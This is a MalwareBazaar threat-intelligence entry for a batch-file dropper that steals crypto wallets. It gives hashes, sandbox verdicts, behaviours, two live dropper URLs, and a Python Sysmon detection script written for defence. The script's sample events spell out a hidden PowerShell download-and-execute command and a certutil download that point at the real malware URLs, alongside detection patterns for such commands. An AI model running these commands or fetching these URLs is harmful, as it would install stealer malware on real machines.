MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown
Vendor detections: 12

SHA256 hash: 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c
SHA3-384 hash: 88de43e764f176100af0829c426a46231be6c9b0c2906af79e1784d637e18fafb9897c7e5d7e67b55d2d7d2d12c6a676
SHA1 hash: d5eaee93a9683bf01463a2b4207172b59351068b
MD5 hash: 47767d805b3fe511c2789dad7bf04a05
humanhash: princess-alaska-solar-violet
File name: rtx.bat
File size: 1'942 bytes
First seen: 2025-05-23 13:57:25 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/x-msdos-batch
ssdeep: 48:ujoMGGi/xajg47AeuvELPn3Zmto9q6Fyp1Hqy4lxe7L8LAlz9sDlqRSM:ujoM/s8s4Ee7LfZmtSfwp1Hqyqxev1vh
Threatray: 43 similar samples on MalwareBazaar
TLSH: T1CA41FDAB5883590C0671EFE1858A41AAD31EC2C60741EFCCF5E08495B43929A42EE98F
Magika: batch
Reporter: abuse_ch
Tags: bat

Intelligence


File Origin
# of uploads: 1
# of downloads: 59
Origin country: NL
Vendor Threat Intelligence

Malware family: asyncrat
ID: 1
File name: samples-downloader.zip
Verdict: Malicious activity
Analysis date: 2025-05-23 12:30:41 UTC
Tags: arch-exec arch-doc loader auto arrow rat lumma stealer generic rustystealer xworm asyncrat rhadamanthys gcleaner vidar loki ransomware chstealer formbook proxyware ghostsocks phishing snake keylogger telegram evasion inno installer delphi putty rmm-tool pyinstaller autoit amadey botnet remote screenconnect

Note: ANY.RUN is an interactive sandbox; its verdict and tags reflect all user actions in the analysis task rather than only the uploaded sample.

Verdict: Malicious
Score: 92.5%
Tags: dropper shell overt
Result
Verdict: Malware

Behaviour
Running batch commands
Creating synchronization primitives
DNS request
Connection attempt
Sending a custom TCP request
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Moving a file to the %temp% subdirectory
Searching for the window
Creating a file
Creating a process with a hidden window
Enabling autorun with the standard Software\Microsoft\Windows\CurrentVersion\Run registry branch
Launching a tool to kill processes
Downloading the file
Enabling autorun

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: bitsadmin certutil crypto fingerprint lolbin powershell
Result
Threat name: n/a
Detection: malicious
Classification: spyw.evad
Score: 96 / 100

Signature
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Joe Sandbox ML detected suspicious sample
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Yara detected Powershell download and execute
Behaviour
Behavior Graph ID: 1697819 | Sample: rtx.bat | Start date: 23/05/2025 | Architecture: WINDOWS | Score: 96

Sample-level signatures: Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; Joe Sandbox ML detected suspicious sample; Sigma detected: Suspicious Script Execution From Temp Folder
Contacted hosts: github.com, objects.githubusercontent.com, 2 other IPs or domains

Process tree (recovered from the behavior graph; signatures in brackets, dropped files and network contacts indented under the process that produced them):
cmd.exe [Suspicious powershell command line found; Tries to download and execute files (via powershell)]
  conhost.exe
  cmd.exe [Suspicious powershell command line found; Tries to download and execute files (via powershell)]
    128582390.exe [Found pyInstaller with non standard icon]
      drops: C:\Users\user\AppData\Local\...\win32ui.pyd (PE32+), C:\Users\user\AppData\...\win32trace.pyd (PE32+), C:\Users\user\AppData\...\win32process.pyd (PE32+), 72 other files (none is malicious)
      128582390.exe [Creates an undocumented autostart registry key; Creates multiple autostart registry keys; Found many strings related to Crypto-Wallets (likely being stolen)]
        drops: C:\Users\user\AppData\Local\...\csrr.hxh (PE32)
        cmd.exe
          mpc.exe
            drops: C:\ProgramData\Samsung\win32event.pyd (PE32), C:\ProgramData\Samsung\win32api.pyd (PE32), C:\ProgramData\Samsung\unicodedata.pyd (PE32), 11 other files (none is malicious)
          conhost.exe
        cmd.exe
          conhost.exe
          taskkill.exe
        cmd.exe
          conhost.exe
          taskkill.exe
        11 other processes
          drops: C:\Users\user\AppData\Local\Temp\...\mpc.exe (PE32)
          conhost.exe (2 instances)
          19 other processes
    powershell.exe [Found many strings related to Crypto-Wallets (likely being stolen); Powershell drops PE file]
      network: github.com 140.82.113.3:443 (GITHUBUS, United States); objects.githubusercontent.com 185.199.111.133:443 (FASTLYUS, Netherlands)
      drops: C:\Users\user\AppData\Local\Temp\...\sys.exe (PE32)
    sys.exe [Drops large PE files]
      drops: C:\Users\user\AppData\Local\Temp\...\rtx.exe (PE32+)
    powershell.exe
      drops: C:\Users\user\AppData\Local\Temp\...\rtx.rar (RAR)
Threat name: Win32.Downloader.Cert
Status: Malicious
First seen: 2025-05-23 13:58:27 UTC
File Type: Text (Batch)
AV detection: 6 of 24 (25.00%)
Threat level: 3/5
Result
Malware family: n/a
Score: 10/10
Tags: discovery execution persistence spyware stealer

Behaviour
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Adds Run key to start application
Looks up external IP address via web service
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies WinLogon for persistence

Malware Config
Dropper Extraction:
https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/sys.exe
https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/rtx.fbx
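The behaviours the vendors report for this sample (PowerShell download-and-execute, script execution from %TEMP%, certutil/bitsadmin downloads, a Run key and a Winlogon modification for persistence, taskkill) and the two dropper URLs translate directly into host-based detections. The Python below is an added example written for this page, not MalwareBazaar's or any sandbox vendor's code: it runs those rules over Sysmon-style process-creation (Event ID 1) and registry value-set (Event ID 13) records. The events it checks are constructed to mirror the reported chain, and the file and value names in them are illustrative; only the two URLs are taken from the entry.

```python
"""Rule-based triage of Sysmon-style events for the behaviours reported above.
Added example for this MalwareBazaar page, not MalwareBazaar or sandbox code.
SAMPLE_EVENTS is constructed; only the two dropper URLs come from the entry."""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Indicators from the entry's "Dropper Extraction" field.
SYS_EXE_URL = "https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/sys.exe"
RTX_FBX_URL = "https://github.com/upsnorwayjs/dmx/releases/download/ttu3535/rtx.fbx"
DROPPER_URLS = {SYS_EXE_URL, RTX_FBX_URL}

SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Sigma "Suspicious Script Execution From Temp Folder": a script file under %TEMP%.
TEMP_SCRIPT_RE = re.compile(
    r"\\AppData\\Local\\Temp\\[^\s\"']*\.(?:bat|cmd|vbs|js|ps1|wsf)\b", re.IGNORECASE)
# "Tries to download and execute files (via powershell)": download primitive + launcher.
PS_DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|start-bitstransfer|invoke-restmethod|\birm\b", re.IGNORECASE)
PS_EXEC_RE = re.compile(
    r"start-process|\bsaps\b|\biex\b|invoke-expression|invoke-item|&\s*['\"$(]", re.IGNORECASE)
# LOLBin downloaders named in the vendor tags (bitsadmin, certutil).
LOLBIN_DOWNLOAD_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+.*/transfer|certutil(?:\.exe)?\s+.*-urlcache", re.IGNORECASE)
# Persistence: Run/RunOnce autorun value and Winlogon Shell/Userinit modification.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
WINLOGON_RE = re.compile(
    r"\\Windows NT\\CurrentVersion\\Winlogon\\(?:Shell|Userinit)$", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def extract_urls(cmdline: str) -> List[str]:
    """URLs embedded in a command line, trailing quotes/punctuation trimmed."""
    return [u.rstrip("'\",);") for u in URL_RE.findall(cmdline)]


def check_process(ev: Event) -> List[str]:
    """Rule names a process-creation event (Sysmon EID 1) matches, in rule order."""
    hits: List[str] = []
    img = image_name(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if img in SCRIPT_HOSTS and TEMP_SCRIPT_RE.search(cmd):
        hits.append("script_execution_from_temp")
    if img in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD_RE.search(cmd) and PS_EXEC_RE.search(cmd):
        hits.append("powershell_download_and_execute")
    if LOLBIN_DOWNLOAD_RE.search(cmd):
        hits.append("lolbin_download")
    if img == "taskkill.exe" and re.search(r"/f\b.*/im\b|/im\b.*/f\b", cmd, re.IGNORECASE):
        hits.append("forced_process_kill")
    if any(url in DROPPER_URLS for url in extract_urls(cmd)):
        hits.append("known_dropper_url")
    return hits


def check_registry(ev: Event) -> List[str]:
    """Rule names a registry value-set event (Sysmon EID 13) matches."""
    hits: List[str] = []
    target = ev.get("TargetObject", "")
    if RUN_KEY_RE.search(target):
        hits.append("run_key_autorun")
    if WINLOGON_RE.search(target):
        hits.append("winlogon_persistence")
    return hits


def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every hit across a batch of events."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        checker = check_registry if ev.get("EventType") == "registry" else check_process
        findings.extend((i, rule) for rule in checker(ev))
    return findings


# Constructed events mirroring the reported chain; file and value names are illustrative.
TEMP = r"C:\Users\user\AppData\Local\Temp"
PS_CRADLE = ('powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('
             f"'{SYS_EXE_URL}','{TEMP}\\sys.exe'); Start-Process '{TEMP}\\sys.exe'\"")
SAMPLE_EVENTS: List[Event] = [
    {"EventType": "process", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'cmd.exe /c "{TEMP}\\rtx.bat"'},
    {"EventType": "process", "CommandLine": PS_CRADLE,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventType": "process", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": f"certutil.exe -urlcache -split -f {RTX_FBX_URL} {TEMP}\\rtx.rar"},
    {"EventType": "process", "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM placeholder.exe"},
    {"EventType": "registry",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\updater"},
    {"EventType": "registry",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"},
    {"EventType": "process", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Run it directly to print the findings for the constructed batch; in practice feed it the CommandLine and TargetObject fields from Sysmon Event IDs 1 and 13. A known_dropper_url hit is an exact IOC match and can be treated as high confidence, while the behavioural rules (Temp-folder scripts, certutil downloads, Run keys) also fire on some legitimate installers and need tuning against a baseline before alerting on them alone.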
Please note that we are no longer able to provide a VirusTotal coverage score.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These rules are matched against malware samples uploaded to MalwareBazaar and against any suspicious process dumps those samples create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Detect_PowerShell_Obfuscation
Author: daniyyell
Description: Detects obfuscated PowerShell commands commonly used in malicious scripts.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Batch (bat) 24dd076d459eec17914c34478bfa67bbcb3803e3a3c4d2684d62c087cff7e35c (this sample)

Delivery method: Distributed via web download